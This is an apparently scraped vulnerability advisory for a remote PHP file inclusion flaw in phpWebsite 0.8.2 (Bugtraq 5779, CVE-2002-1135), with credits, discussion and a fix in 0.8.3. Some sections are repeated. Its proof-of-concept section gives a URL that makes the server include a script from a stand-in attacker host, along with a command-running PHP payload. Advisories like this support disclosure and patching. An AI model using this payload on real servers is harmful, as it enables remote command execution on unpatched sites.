phpWebsite PHP File Include Vulnerability
BID:5779
Info
phpWebsite PHP File Include Vulnerability
| Bugtraq ID: | 5779 |
| Class: | Configuration Error |
| CVE: |
CVE-2002-1135 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 23 2002 12:00AM |
| Updated: | Jul 11 2009 05:06PM |
| Credit: | Discovery credited to Tim Vandermeersch. |
| Vulnerable: |
phpWebsite phpWebsite 0.8.2 |
| Not Vulnerable: |
phpWebsite phpWebsite 0.8.3 |
Discussion
phpWebsite PHP File Include Vulnerability
A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script.
This issue could be exploited to execute arbitrary commands within the context of the webserver process.
A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script.
This issue could be exploited to execute arbitrary commands within the context of the webserver process.
Exploit / POC
phpWebsite PHP File Include Vulnerability
No exploit is required.
The following proof of concept has been supplied by Tim Vandermeersch:
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<?php echo "<?php passthru("/bin/ls");?>" ?> .
No exploit is required.
The following proof of concept has been supplied by Tim Vandermeersch:
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<?php echo "<?php passthru("/bin/ls");?>" ?> .
Solution / Fix
phpWebsite PHP File Include Vulnerability
Solution:
An updated modsecurity.php script has been released.
The vendor has addressed the issue in v0.8.3:
phpWebsite phpWebsite 0.8.2
Solution:
An updated modsecurity.php script has been released.
The vendor has addressed the issue in v0.8.3:
phpWebsite phpWebsite 0.8.2
-
phpWebsite modsecurity.php 1.11
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite -
phpWebsite phpWebsite 0.8.3
http://phpwebsite.appstate.edu/downloads/0.8.3/
References
phpWebsite PHP File Include Vulnerability
References:
References: